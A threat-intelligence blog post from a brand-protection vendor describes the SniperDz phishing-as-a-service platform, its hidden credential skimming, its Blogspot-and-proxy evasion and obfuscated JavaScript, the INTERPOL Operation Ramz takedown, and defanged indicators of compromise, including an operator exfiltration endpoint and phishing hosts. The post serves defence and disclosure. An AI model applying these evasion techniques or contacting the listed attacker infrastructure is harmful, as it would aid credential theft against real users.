Skip to main content
PhishEye

SniperDz: Phishing-as-a-Service, Dismantled

13 min read

SniperDz takedown — a phishing-as-a-service kit storefront with a red takedown slash and a green seizure seal, over the INTERPOL Operation Ramz figures.
Contents

For more than a decade, anyone who wanted to run a phishing campaign but lacked the skill to build one had a free option. It was called SniperDz — also written Sniper Dz — a phishing-as-a-service (PhaaS) platform that handed out ready-made fake login pages, hosted them on legitimate services to slip past filters, and charged its users nothing up front. In mid-2026, that decade ended: INTERPOL, working with threat-intelligence firm Group-IB and national police across 13 countries, dismantled the operation and arrested its administrator as part of Operation Ramz.

The scale is the headline. Palo Alto Networks' Unit 42 discovered more than 140,000 SniperDz phishing websites in a single year of tracking; Group-IB's takedown investigation tied the ecosystem to 20,000-plus unique domains, 80 templates impersonating 30-plus global brands, and tens of thousands of stolen credentials. SniperDz did all of this while presenting itself, to the low-skill criminals who used it, as a generous free service — and quietly stealing from them, too.

That combination — disposable lookalike domains, brand-impersonation kits, and throwaway hosting on trusted platforms — is exactly the infrastructure PhishEye tracks every day. The SniperDz takedown is a rare look inside a PhaaS operation from the moment it was switched on to the moment the cuffs went on. Here is how it worked, how investigators unmasked the person behind it, the indicators to hunt for, and what the case tells defenders about the phishing economy that outlives any single arrest.

At a glance
Operation SniperDz / Sniper Dz (also operated as Joker Dz, Storm Dz, Spam Dz)
Type Phishing-as-a-service (PhaaS) — free fake-login kits + hosting
Active ~2015–2025 (roughly a decade)
Scale 140,000+ phishing sites in one year (Unit 42); 20,000+ domains, 80 templates, 30+ brands (Group-IB)
Takedown INTERPOL Operation Ramz with Group-IB, Oct 2025 – Feb 2026
Result 201 arrests across 13 MENA countries; administrator "Guedz" arrested in Algeria

What SniperDz was: free phishing, at scale

Phishing-as-a-service is exactly what it sounds like — the software-as-a-service model applied to crime. Instead of coding a convincing PayPal or Instagram login clone, a would-be phisher rents (or, in SniperDz's case, simply takes) a finished one from a platform that handles the templates, the hosting tricks, and the credential collection. PhaaS is the single biggest reason phishing volume keeps climbing: it removes the only barrier that ever kept unskilled actors out, which is skill.

SniperDz industrialized that model and ran it for about ten years. According to the Group-IB and Unit 42 research, the platform offered:

  • 80 ready-made phishing templates cloning the login pages of more than 30 major brands, including PayPal, Facebook, Instagram, Yahoo, Netflix, and Steam.
  • Multi-language support — Arabic, English, and French for core operations, with Spanish and Hebrew kits that were retired around 2020.
  • A Telegram channel (latterly t.me/JokerDzV2) used to distribute tutorials and sustain a decade-long community of users; Unit 42 counted 7,156 subscribers and a single tutorial video with 72,600 views in August 2024.
  • An administrator panel that surfaced everything the kits captured — username, password, template name, timestamp, and the victim's IP address and country — in near real time.

Over its life the ecosystem touched more than 20,000 unique domains, and Unit 42 alone discovered 140,000-plus distinct phishing pages in one year of tracking from July 2023. The platform rebranded repeatedly — surfacing as Joker Dz, Storm Dz, and Spam Dz — but the operator, the playbook, and the infrastructure underneath stayed recognizably the same.

"Free" was the funnel — and SniperDz robbed its own users

A free phishing platform raises an obvious question: where is the money? SniperDz answered it twice over, and the second answer is the part defenders should sit with.

Charging nothing is a deliberate growth strategy. Zero price means zero friction, which means volume — thousands of low-skill users deploying thousands of phishing pages. But SniperDz did not simply give the tooling away. Unit 42 found that the platform secretly exfiltrated a copy of every credential its users phished to a central endpoint, raviral[.]com/k_fac.php, controlled by the SniperDz operators — separate from, and in addition to, the phisher who actually ran the campaign. In Unit 42's words, the operators "collect victim credentials stolen by phishers who use their platform to compensate for the cost of service."

In other words, the "free" tier was a double-cross. The amateur phisher thought they were getting free infrastructure; in reality they were unpaid labour, deploying pages whose entire take was silently mirrored back to the people who built the kit. On top of that skim, victims were funneled into carrier-billing fraud, premium-rate SMS subscriptions, and browser-notification abuse — squeezing revenue out of people whether or not their credentials were the prize. SniperDz turned a crowd of amateur phishers into a distribution network it didn't have to pay and quietly collected on every end at once.

Unique tactics: hiding phishing pages on trusted platforms

Two technical tricks, documented by Unit 42, explain much of SniperDz's longevity.

Hosting on legitimate platforms. The admin panel included an automated tool that reformatted standard HTML phishing pages into Blogger (Blogspot)-compatible templates, so operators could serve their fake login pages from a reputable Google-owned host rather than from obviously malicious infrastructure. A phishing page served from a trusted domain inherits that domain's good reputation — it is less likely to be blocked, more likely to render past corporate proxies, and more convincing to a victim glancing at the address bar.

Proxy concealment. SniperDz routed delivery through a legitimate public proxy (proxymesh[.]com) so that a victim's browser — or a security crawler — would see the proxy as responsible for loading the phishing content, masking the platform's actual backend (dev-cdn370.pantheonsite[.]io). The page's JavaScript was heavily obfuscated with String.fromCharCode and unescape to hide the exfiltration URLs and HTML from casual inspection.

Combine those with a constant churn of cheap, newly registered lookalike domains as the entry points, and you get the sprawling footprint investigators ultimately mapped — most of it disposable by design, rotating faster than blocklists could keep up.

How the SniperDz phishing-as-a-service model worked A free platform that collected on both ends 1 · Operator "Guedz" ships 80 free kits + Blogspot hosting Telegram · 7,156 2 · Amateur users Deploy fake logins for PayPal, Meta, Netflix, Steam… 140,000+ pages 3 · Victims Enter credentials on a trusted-looking page 4 · Double-cross A copy is skimmed to the operator: raviral[.]com 5 · Cash out Credential sale · carrier billing · premium SMS The users paid nothing and did the work; SniperDz monetized the credentials and the traffic — and skimmed a copy for itself. Sources: Palo Alto Unit 42 · Group-IB investigation into Sniper Dz · INTERPOL Operation Ramz.
Figure 1. The SniperDz funnel. A no-cost platform converts a crowd of low-skill users into an unpaid phishing distribution network — and steals the take a second time.

Operation Ramz: the takedown

SniperDz came down inside Operation Ramz, an INTERPOL-coordinated crackdown on phishing, malware, and cyber-scam infrastructure across the Middle East and North Africa, run between October 2025 and February 2026. Thirteen nations took part: Algeria, Bahrain, Egypt, Iraq, Jordan, Lebanon, Libya, Morocco, Oman, Palestine, Qatar, Tunisia, and the United Arab Emirates.

The headline numbers from Operation Ramz:

Metric Figure
Arrests 201
Additional suspects identified 382
Victims identified 3,867
Servers seized 53
Compromised accounts flagged by Group-IB 5,000+ (including government infrastructure)

Group-IB's role was the intelligence backbone — it shared details of active phishing infrastructure and a list of thousands of compromised accounts that gave national units something concrete to act on. In Algeria, that thread led directly to SniperDz: police arrested the administrator and seized the hardware running the platform — servers, computers, phones, and hard drives loaded with phishing software and scripts.

The operation also surfaced the human cost behind the scams. In Jordan, a raid on a financial-fraud operation found 15 people working the scheme — and investigators determined they were human-trafficking victims coerced into the fraud, not willing participants. Two suspected orchestrators were arrested. It is a reminder that the "scam economy" PhaaS feeds is frequently staffed by people who are themselves victims.

Unmasking "Guedz"

The most instructive part of the case is how investigators tied a decade of rotating brand names back to one person. None of it required breaking the platform's encryption — it required patience and open-source intelligence.

Group-IB's attribution leaned on the operator's own digital exhaust:

  • Tutorial videos that leaked operational details. Screen recordings posted to promote the platform inadvertently exposed administrator email addresses and live accounts — a self-inflicted wound common among operators who treat their criminal enterprise like a normal software product.
  • WHOIS correlation across rebrands. Historical domain-registration records linked the platform's successive identities — including domains such as hero-egy[.]com, stormdz[.]com, and jokerdz[.]com — back to common registrant fingerprints.
  • A ten-year social and Telegram trail. Posting history across social platforms and a long-running Telegram channel documented the platform's evolution in the operator's own words.
  • Group-IB's Investigation Graph, which stitched the technical indicators to the public digital footprint until a single individual — handle "Guedz" — sat at the center.

That person was arrested by the Algerian National Police. The lesson for defenders is that attribution is cumulative: a rebrand resets the marketing, not the history, and ten years of small operational mistakes eventually compound into an identity.

Indicators of compromise (IoCs)

Defanged with [.] — re-fang by replacing [.] with . before loading into tooling. The sample indicators below come from a malware-sandbox detonation of a SniperDz phishing page; the platform indicators are from Unit 42; the historical domains span the rebrands.

Sample infrastructure

Type Indicator Notes
Domain aff.bnaosf1he[.]shop SniperDz phishing host
Domain win.anababayala[.]com SniperDz phishing host
Domain win.feezossl[.]xyz SniperDz phishing host
IPv4 184.154.10[.]254 US · AS32475 SingleHop LLC
IPv4 65.60.9[.]236 US · AS32475 SingleHop LLC

Platform & operator infrastructure (Unit 42)

Type Indicator Role
Exfil endpoint raviral[.]com/k_fac.php Central credential collection (operator-controlled)
Backend dev-cdn370.pantheonsite[.]io Origin masked behind the proxy
Proxy abused proxymesh[.]com Legitimate proxy used to hide the backend
Host abused Blogspot / blogger.com Phishing pages auto-converted to Blogger format

Historical aliases & channels (Group-IB)

Type Indicator
Platform aliases SniperDz / Sniper Dz · Joker Dz · Storm Dz · Spam Dz
Historical domains hero-egy[.]com · stormdz[.]com · jokerdz[.]com
Telegram t.me/JokerDzV2 (7,156 subscribers, Aug 2024)

Behavioral signal to hunt: JavaScript using String.fromCharCode and unescape to assemble exfiltration URLs, plus outbound POSTs to a credential-collection endpoint that does not match the page's apparent brand or host.

What the SniperDz takedown means for defenders

A 201-arrest operation is a genuine win, but it is worth being clear about what it does and does not change for the brands these kits impersonate.

  • PhaaS has permanently lowered the barrier. The skill that once gated phishing is gone; the cost is often zero. Even with SniperDz dismantled, dozens of comparable kits and storefronts remain, and the demand it served has not evaporated.
  • Kits respawn under new names. SniperDz itself rebranded three times. Expect the templates, the legitimate-host abuse, and the disposable-domain playbook to resurface under different branding. The infrastructure pattern is more durable than any one platform.
  • The durable defense is detection and takedown, not waiting for the police. Law enforcement disrupts the supply of kits; brand protection disrupts the deployment of individual phishing sites that target you, in days rather than years. The two are complementary, and only one of them happens on your timeline.
  • Watch the trusted platforms, not just shady TLDs. SniperDz's edge was hosting on Blogspot behind a proxy. Monitoring has to cover lookalike pages on reputable hosts, not only newly registered domains.

For any brand on SniperDz's target list — payment platforms, social networks, streaming and gaming services, and the long tail of companies whose logins are worth stealing — the practical takeaway is that you cannot rely on a once-a-decade takedown. You need continuous discovery of lookalike domains and fake login pages, plus a takedown pipeline that removes them before they collect a meaningful number of credentials.

How PhishEye fits in

The SniperDz case is a clean illustration of the threat PhishEye is built to counter: a brand's login page, cloned into a kit, deployed across thousands of disposable lookalike domains, and hosted on trusted platforms to dodge reputation filters.

PhishEye continuously discovers lookalike and impersonation domains, fake login and brand-clone pages, and the throwaway infrastructure attackers stage them on — then ships evidence and runs coordinated takedowns across registrars, hosts, and platforms, including abuse-of-trust hosting like Blogspot and other legitimate services. Pair that with dark web and AI monitoring to catch the credentials and brand mentions that surface after a successful steal, and you compress both halves of the timeline: how long a phishing page survives, and how long stolen credentials stay useful. If you want to gut-check a suspicious link yourself, the free phishing URL checker flags throwaway TLDs, lookalike hosts, and other red flags in seconds.

Frequently asked questions

What is SniperDz? SniperDz (also written Sniper Dz) was a phishing-as-a-service platform active for roughly a decade. It gave low-skill criminals free, ready-made phishing kits — fake login pages cloning major brands — along with hosting tricks to keep them online, while the operators secretly skimmed a copy of every stolen credential and monetized victim traffic. It also operated under the names Joker Dz, Storm Dz, and Spam Dz.

Is it spelled SniperDz or Sniper Dz? Both. Security vendors and INTERPOL use the two-word form "Sniper Dz," while the one-word "SniperDz" is common in coverage and search. They refer to the same phishing-as-a-service platform.

What is phishing-as-a-service? Phishing-as-a-service is the crime equivalent of software-as-a-service: a platform supplies finished phishing templates, hosting, and credential-collection infrastructure so that buyers (or, with SniperDz, free users) can run campaigns without building anything. It is a major driver of rising phishing volume because it removes the skill barrier.

What was Operation Ramz? Operation Ramz was an INTERPOL-coordinated operation against phishing, malware, and scam infrastructure across 13 Middle East and North Africa countries, run from October 2025 to February 2026 with intelligence from Group-IB. It resulted in 201 arrests, 53 seized servers, and the dismantling of SniperDz, whose administrator was arrested in Algeria.

Who was behind SniperDz? Group-IB attributed the platform to an operator using the handle "Guedz," identified through OSINT — including tutorial videos that leaked administrator accounts, WHOIS correlations across the platform's rebrands, and a ten-year social and Telegram trail. The administrator was arrested by the Algerian National Police.

Does this takedown end the phishing-as-a-service threat? No. The arrest disrupts one major supplier, but PhaaS as a model is firmly established, and comparable kits remain available. SniperDz rebranded three times during its life; the templates and disposable-domain playbook are likely to resurface elsewhere. Continuous brand monitoring and fast takedown remain the practical defense for targeted brands.

My brand's login page is being cloned — what can I do? Get continuous discovery of lookalike domains and fake login pages, then move quickly to takedown. PhishEye detects and removes impersonation pages across registrars, hosts, and platforms; you can also report and remove a single page using our guide on how to take down a phishing website.

References

← Back to blog